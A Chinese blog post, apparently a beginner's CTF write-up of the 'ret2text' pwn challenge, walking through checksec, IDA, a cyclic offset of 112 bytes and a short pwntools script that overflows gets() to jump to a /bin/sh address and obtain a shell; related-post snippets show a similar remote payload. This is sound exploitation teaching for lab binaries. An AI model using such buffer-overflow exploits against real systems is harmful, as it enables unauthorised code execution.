ret2text

最新推荐文章于 2024-04-04 11:52:25 发布
最新推荐文章于 2024-04-04 11:52:25 发布
阅读量224 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54262894/article/details/121021529
版权

 

最近攻防世界和BUUCTF中剩下我没做过的题目已经对于我来说有些困难了

所以我在CTF wiki 里开始学习,顺便再巩固一下基础

这里是原文

老样子,先checksec

 

放入ida中查看

main函数

 

发现了gets这个危险函数,接着往下看

用Shift+F12查看

发现了/bin/sh

 

 这里你会看到有两个/bin/sh,但我们需要的是text中的地址

记住 text 中 /bin/sh 的地址 0x804863A

思路有了,我们先计算需要多少个字节能够填满,然后加上我们想要跳转的/bin/sh的地址就可以拿到权限

话不多说,甘蔗!

 

在做这步之前我先用cyclic命令生成了200个字符

这里可以看出偏移了112个字节

开始写payload

from pwn import *

p=process('./ret2text')

addr_binsh = 0x804863A

payload = 'a' * 112 + p32(addr_binsh)

p.sendline(payload)

p.interactive()

执行一下试试

 

OK,成功获得shell!

不会解pwn的泽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6099
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
入门pwn题目ret2text
03-26
入门pwn题目ret2text
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1269
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
ret2text(system($0)),带你彻底搞懂网络安全启动速度优化
最新发布
2401_84102720的博客
04-04 651
我们看道例题经典nx,栈迁移,本该是很简单的一道题,但是涉及到system($0),就难理解了一点点,仅仅是一点点废话不多说,距离rbp,0x10,填充0x18覆盖rbp,构造ret,这时候我们发现有system函数,没有/bin/sh,怎么办,可能有小伙伴想ret2libc,当然可以,但是太过麻烦,我们发现有的tips函数还没有看我们直接进去西索我们详细分析这串代码:这段文本是一个反汇编代码片段,它描述了一个名为tips的函数或过程的汇编实现。这行标记了一个名为tips。
浅谈 ret2text
akdelt的博客
01-21 936
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ROP初探之ret2text
chlet的博客
05-05 487
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
二进制漏洞挖掘之ret2text栈溢出
brucexia的专栏
01-31 609
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
ret2text涉及到的堆栈平衡问题-附件资源
03-05
ret2text涉及到的堆栈平衡问题-附件资源
2019 text 2 英语一&二1
08-08
2019 text 2英语一<词>inflation n. 膨胀bury v. 掩藏catalog n. 目录forgiveness n. 宽恕,宽容大量ret
jQuery中实现text()的方法
12-29
嘿嘿嘿 哈哈哈 二、jQuery 的 text() 方法 (1)当直接调用 $().text()时,.text()的作用是(循环)读取(多个)目标元素的textContent/... ret = , i = 0, nodeType = elem.nodeType console.log(nodeType,'
template-text:模板中的文字可用于所有用途
03-27
模板文字 使用LiveScript语法从模板生成文本以用于所有目的。 使用eval因此应始终将其与拥有/审阅的template.file 。 用法 用npm安装: npm install --save template-text ...ret = tt("<template>
flatland-emacs:Sublime Text Flatland 主题的 Emacs 端口
05-31
Flatland for Emacs是Sublime Text流行的主题的直接移植。 由像素实验室开发。 这个主题使用从 Emacs 24 开始可用的新的内置主题支持。 笔记 这仍在开发中。 目前,这仅在 emacs 的 GUI 版本中进行了测试,未在终端...
DSP实验报告(2).doc
03-09
RET .end 六、实验结果 实验二 加减法和乘法运算 一、实验目的 掌握加减法和乘法运算指令。 二、实验设备 计算机 三、实验内容 编写程序,分别实现计算z=x+y-w、y=mx+b、y=。 四、实验结果 1 y=mx+b 源程序如下: ....
prettify 代码高亮着色器google出品
12-12
link href=”http://google-code-prettify.googlecode.com/svn/trunk/src/prettify.css” rel=”stylesheet” type=”text/css”/> [removed] 将<body>改为: 代码如下: <body onload=’pre
url2io.py正文提取SDK,使用方法见资源描述
10-02
正文提取api的函数,使用以下代码(url可改)即可提取正文: import url2io api = url2io.API("7vE7n2DHQ5SUmsZ85ZzOoA") ret = api.article(url='你想要提取正文的url',fields=['text',]) print(ret['text'])
poyonga:Python Groonga客户端
05-24
Poyonga Python 客户端。...装备Python 3.6+安装从点子: pip install --upgrade poyonga用法设置Groonga服务器$ groonga -n grn.db # ... call ( "status" )>> > ret< poyonga . result . GroongaResult object at 0x8
好好说话之ret2text
hollk’s blog
06-22 1968
本题为bamboofox-ret2text 题目路径: /ctf-challenges/pwn/stackoverflow/ret2text/bamboofox-ret2text 一、原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadget...
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 408
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
PWN初体验之ret2text
weixin_43137410的博客
08-04 653
"Hello,World!"的浪漫可能只有直男才懂!
ret = requests.post(url=url, headers=header, data=data_dict.get("b_data")) print(ret.text) 得到的ret.text是什么格式的字符
06-03
`ret.text` 是一个字符串类型的数据。当使用 requests 库发送 POST 请求时,服务器返回的响应数据会以字符串的形式存储在 Response 对象的 text 属性中。这个字符串的内容是服务器返回的原始文本数据,其格式和编码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值